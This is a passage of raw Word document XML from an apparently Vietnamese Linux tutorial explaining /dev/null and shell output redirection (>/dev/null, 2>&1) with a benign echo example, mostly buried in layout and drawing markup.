                <v:shape id="Text Box 124" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;left:1440;top:182;width:7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5565095" w14:textId="77777777" w:rsidR="00D70735" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                        <w:pPr>
                          <w:spacing w:before="22"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:sz w:val="11"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:color w:val="EB5757"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="11"/>
                          </w:rPr>
                          <w:t>/dev/null</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="002D4A21" w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>là</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1</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device</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hay</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1</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file</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đặ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biệt</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trong</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inux</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chứa</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cá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dữ</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iệu</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rác</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từ</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cá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input</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stream</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khi</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ko</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muốn</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xử</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ý</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hoặ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hiển</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thị nó (hố đen chó thể chứa tất cả các dữ liệu được redirect tới</w:t>
      </w:r>
      <w:r w:rsidR="002D4A21" w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-27"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D4A21" w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nó)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719A014D" w14:textId="0ACB2BD1" w:rsidR="002D4A21" w:rsidRPr="00665E18" w:rsidRDefault="002D4A21" w:rsidP="00665E18">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="84" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251644928" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="65372823" wp14:editId="65F5DB9B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>76835</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="137795" cy="10477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04775"/>
                          <a:chOff x="1440" y="121"/>
                          <a:chExt cx="217" cy="165"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="182"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120"/>
                            <a:ext cx="21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90"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1440" y="120"/>
                            <a:ext cx="21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2B16" w14:textId="77777777" w:rsidR="00D70735" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                              <w:pPr>
                                <w:spacing w:before="22"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:sz w:val="11"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:color w:val="EB5757"/>
                                  <w:w w:val="103"/>
                                  <w:sz w:val="11"/>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2823" id="Group 181" o:spid="_x0000_s1032" style="position:absolute;left:0;text-align:left;margin-left:1in;margin-top:6.05pt;width:10.85pt;height:8.25pt;z-index:251644928;mso-position-horizontal-relative:page" coordorigin="1440,121" coordsize="21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3" type="#_x0000_t75" style="position:absolute;left:1440;top:120;width:21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">
                  <v:imagedata r:id="rId25" o:title=""/>
                </v:shape>
                <v:shape id="Text Box 90" o:spid="_x0000_s1034" type="#_x0000_t202" style="position:absolute;left:1440;top:120;width:21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E7E2B16" w14:textId="77777777" w:rsidR="00D70735" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                        <w:pPr>
                          <w:spacing w:before="22"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:sz w:val="11"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:color w:val="EB5757"/>
                            <w:w w:val="103"/>
                            <w:sz w:val="11"/>
                          </w:rPr>
                          <w:t>&gt;</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>toán</w:t>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tử</w:t>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>redirect</w:t>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>từ</w:t>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>luồng</w:t>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>này</w:t>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sang</w:t>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>luồng</w:t>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stream</w:t>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>khác</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C30E168" w14:textId="1C8985D1"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 với:</w:t>
      </w:r>
      <w:r w:rsidR="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00665E18" w:rsidRPr="00665E18">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>echo hello &gt;/dev/null 2&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A442521"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p>
    <w:p w14:paraId="63512E5D" w14:textId="45E5A54B" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251648000" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2EBE3856" wp14:editId="23F6C83D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>986155</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>49530</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="33020" cy="33020"/>
                <wp:effectExtent l="5080" t="1905" r="9525" b="317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1583 1553"/>
                            <a:gd name="T1" fmla="*/ T0 w 52"/>
                            <a:gd name="T2" fmla="+- 0 129 78"/>
                            <a:gd name="T3" fmla="*/ 129 h 52"/>
                            <a:gd name="T4" fmla="+- 0 1576 1553"/>
                            <a:gd name="T5" fmla="*/ T4 w 52"/>
                            <a:gd name="T6" fmla="+- 0 129 78"/>
                            <a:gd name="T7" fmla="*/ 129 h 52"/>
                            <a:gd name="T8" fmla="+- 0 1572 1553"/>
                            <a:gd name="T9" fmla="*/ T8 w 52"/>
                            <a:gd name="T10" fmla="+- 0 129 78"/>
                            <a:gd name="T11" fmla="*/ 129 h 52"/>
                            <a:gd name="T12" fmla="+- 0 1553 1553"/>
                            <a:gd name="T13" fmla="*/ T12 w 52"/>
                            <a:gd name="T14" fmla="+- 0 107 78"/>
                            <a:gd name="T15" fmla="*/ 107 h 52"/>
                            <a:gd name="T16" fmla="+- 0 1553 1553"/>
                            <a:gd name="T17" fmla="*/ T16 w 52"/>
                            <a:gd name="T18" fmla="+- 0 100 78"/>
                            <a:gd name="T19" fmla="*/ 100 h 52"/>
                            <a:gd name="T20" fmla="+- 0 1576 1553"/>
                            <a:gd name="T21" fmla="*/ T20 w 52"/>
                            <a:gd name="T22" fmla="+- 0 78 78"/>
                            <a:gd name="T23" fmla="*/ 78 h 52"/>
                            <a:gd name="T24" fmla="+- 0 1583 1553"/>
                            <a:gd name="T25" fmla="*/ T24 w 52"/>
                            <a:gd name="T26" fmla="+- 0 78 78"/>
                            <a:gd name="T27" fmla="*/ 78 h 52"/>
                            <a:gd name="T28" fmla="+- 0 1605 1553"/>
                            <a:gd name="T29" fmla="*/ T28 w 52"/>
                            <a:gd name="T30" fmla="+- 0 100 78"/>
                            <a:gd name="T31" fmla="*/ 100 h 52"/>
                            <a:gd name="T32" fmla="+- 0 1605 1553"/>
                            <a:gd name="T33" fmla="*/ T32 w 52"/>
                            <a:gd name="T34" fmla="+- 0 107 78"/>
                            <a:gd name="T35" fmla="*/ 107 h 52"/>
                            <a:gd name="T36" fmla="+- 0 1586 1553"/>
                            <a:gd name="T37" fmla="*/ T36 w 52"/>
                            <a:gd name="T38" fmla="+- 0 129 78"/>
                            <a:gd name="T39" fmla="*/ 12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0" y="51"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="23" y="51"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="19" y="51"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="29"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="22"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="23" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="30" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="52" y="22"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="52" y="29"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="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974" id="Freeform 177" o:spid="_x0000_s1026" style="position:absolute;margin-left:77.65pt;margin-top:3.9pt;width:2.6pt;height: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" path="m30,51r-7,l19,51,,29,,22,23,r7,l52,22r,7l33,51r-3,xe" fillcolor="black" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="19050,81915;14605,81915;12065,81915;0,67945;0,63500;14605,49530;19050,49530;33020,63500;33020,67945;20955,81915" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;/dev/null: redirect tất cả các standard output sang /dev/null =</w:t>
      </w:r>
      <w:r w:rsidR="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00665E18">
        <w:t>1&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6C9BA6" w14:textId="1EF12022" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="00665E18">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="157" w:after="0" w:line="321" w:lineRule="auto"/>
        <w:ind w:right="665" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251651072" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3085942A" wp14:editId="4D6C9A76">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>986155</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>149225</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="33020" cy="33020"/>
                <wp:effectExtent l="5080" t="1270" r="9525" b="381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1583 1553"/>
                            <a:gd name="T1" fmla="*/ T0 w 52"/>
                            <a:gd name="T2" fmla="+- 0 286 235"/>
                            <a:gd name="T3" fmla="*/ 286 h 52"/>
                            <a:gd name="T4" fmla="+- 0 1576 1553"/>
                            <a:gd name="T5" fmla="*/ T4 w 52"/>
                            <a:gd name="T6" fmla="+- 0 286 235"/>
                            <a:gd name="T7" fmla="*/ 286 h 52"/>
                            <a:gd name="T8" fmla="+- 0 1572 1553"/>
                            <a:gd name="T9" fmla="*/ T8 w 52"/>
                            <a:gd name="T10" fmla="+- 0 286 235"/>
                            <a:gd name="T11" fmla="*/ 286 h 52"/>
                            <a:gd name="T12" fmla="+- 0 1553 1553"/>
                            <a:gd name="T13" fmla="*/ T12 w 52"/>
                            <a:gd name="T14" fmla="+- 0 264 235"/>
                            <a:gd name="T15" fmla="*/ 264 h 52"/>
                            <a:gd name="T16" fmla="+- 0 1553 1553"/>
                            <a:gd name="T17" fmla="*/ T16 w 52"/>
                            <a:gd name="T18" fmla="+- 0 257 235"/>
                            <a:gd name="T19" fmla="*/ 257 h 52"/>
                            <a:gd name="T20" fmla="+- 0 1576 1553"/>
                            <a:gd name="T21" fmla="*/ T20 w 52"/>
                            <a:gd name="T22" fmla="+- 0 235 235"/>
                            <a:gd name="T23" fmla="*/ 235 h 52"/>
                            <a:gd name="T24" fmla="+- 0 1583 1553"/>
                            <a:gd name="T25" fmla="*/ T24 w 52"/>
                            <a:gd name="T26" fmla="+- 0 235 235"/>
                            <a:gd name="T27" fmla="*/ 235 h 52"/>
                            <a:gd name="T28" fmla="+- 0 1605 1553"/>
                            <a:gd name="T29" fmla="*/ T28 w 52"/>
                            <a:gd name="T30" fmla="+- 0 257 235"/>
                            <a:gd name="T31" fmla="*/ 257 h 52"/>
                            <a:gd name="T32" fmla="+- 0 1605 1553"/>
                            <a:gd name="T33" fmla="*/ T32 w 52"/>
                            <a:gd name="T34" fmla="+- 0 264 235"/>
                            <a:gd name="T35" fmla="*/ 264 h 52"/>
                            <a:gd name="T36" fmla="+- 0 1586 1553"/>
                            <a:gd name="T37" fmla="*/ T36 w 52"/>
                            <a:gd name="T38" fmla="+- 0 286 235"/>
                            <a:gd name="T39" fmla="*/ 2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0" y="51"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="23" y="51"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="19" y="51"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="29"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="22"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="23" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="30" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="52" y="22"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="52" y="29"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="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B9D9" id="Freeform 173" o:spid="_x0000_s1026" style="position:absolute;margin-left:77.65pt;margin-top:11.75pt;width:2.6pt;height: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" path="m30,51r-7,l19,51,,29,,22,23,r7,l52,22r,7l33,51r-3,xe" fillcolor="black" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="19050,181610;14605,181610;12065,181610;0,167640;0,163195;14605,149225;19050,149225;33020,163195;33020,167640;20955,181610" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0F91D7DE" wp14:editId="5A6E7396">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1104265</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>123190</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="222885" cy="104775"/>
                <wp:effectExtent l="0" t="381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04775"/>
                          <a:chOff x="1739" y="194"/>
                          <a:chExt cx="351" cy="165"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="171"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38" y="193"/>
                            <a:ext cx="3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27"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1738" y="193"/>
                            <a:ext cx="3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0E74" w14:textId="77777777" w:rsidR="00D70735" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                              <w:pPr>
                                <w:spacing w:before="22"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:sz w:val="11"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Liberation Mono"/>
                                  <w:color w:val="EB5757"/>
                                  <w:w w:val="105"/>
                                  <w:sz w:val="11"/>
                                </w:rPr>
                                <w:t>2&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D7DE" id="Group 170" o:spid="_x0000_s1035" style="position:absolute;left:0;text-align:left;margin-left:86.95pt;margin-top:9.7pt;width:17.55pt;height:8.25pt;z-index:-251640832;mso-position-horizontal-relative:page" coordorigin="1739,194" coordsize="35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">
                <v:shape id="Picture 126" o:spid="_x0000_s1036" type="#_x0000_t75" style="position:absolute;left:1738;top:193;width:35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">
                  <v:imagedata r:id="rId27" o:title=""/>
                </v:shape>
                <v:shape id="Text Box 127" o:spid="_x0000_s1037" type="#_x0000_t202" style="position:absolute;left:1738;top:193;width:3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71A0E74" w14:textId="77777777" w:rsidR="00D70735" w:rsidRDefault="00D70735" w:rsidP="002D4A21">
                        <w:pPr>
                          <w:spacing w:before="22"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:sz w:val="11"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Liberation Mono"/>
                            <w:color w:val="EB5757"/>
                            <w:w w:val="105"/>
                            <w:sz w:val="11"/>
                          </w:rPr>
                          <w:t>2&gt;&amp;1</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00665E18">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2&gt;&amp;1 </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>redirect</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tất</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cả</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>các</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-9"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>standard</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
